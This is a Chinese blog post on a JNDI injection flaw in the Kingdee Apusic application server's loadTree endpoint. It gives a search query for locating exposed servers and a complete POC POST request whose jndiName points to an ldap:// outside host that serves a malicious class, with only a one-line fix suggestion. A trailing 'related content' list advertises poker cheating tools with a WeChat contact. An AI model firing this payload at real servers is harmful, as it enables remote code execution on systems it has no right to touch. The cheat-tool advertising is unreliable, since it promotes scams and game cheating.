金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

2次安卓wpk有机器人的(脚本... 《wpk软件透明挂》是一款多人竞技的wpk辅助透视游戏,你将微扑克对手来到同一个战场,为至高无上的荣...
六次必备微扑克用模拟器(脚本)... 六次必备微扑克用模拟器(脚本)微扑克钻石能提高胜率的(2022已更新)(哔哩哔哩);1、不需要AI权...
九分钟漏洞微扑克辅助器ios(... 九分钟漏洞微扑克辅助器ios(工具)微扑克用模拟器(2024已更新)(哔哩哔哩);微扑克最新版本免费...
6次实锤微扑克辅助是有挂(神器... 《微扑克软件透明挂》是一款多人竞技的微扑克辅助透视游戏,你将微扑克对手来到同一个战场,为至高无上的荣...
5分钟教程wepoke有科技的... 您好,wepoke这款游戏可以开挂的,确实是有挂的,需要了解加微【136704302】很多玩家在这款...
1次开挂微扑克一直输(开挂)w... 您好,微扑克这款游戏可以开挂的,确实是有挂的,需要了解加微【136704302】很多玩家在这款游戏中...
4分钟安卓版wepoke ai... 4分钟安卓版wepoke ai代打辅助(插件)wepoke辅助技巧(2025已更新)(哔哩哔哩);最...
四次代打aiwepoke小技巧... 您好,微扑克这款游戏可以开挂的,确实是有挂的,需要了解加微【136704302】很多玩家在这款游戏中...
2020版德州wpk德州代打是... 2020版德州wpk德州代打是真的的(透视挂)wepoke有科技的(2024已更新)(哔哩哔哩);w...
五分钟系统微扑克辅助器是真的的... 五分钟系统微扑克辅助器是真的的(神器)wpk代打是真的的(2025已更新)(哔哩哔哩);最新版202...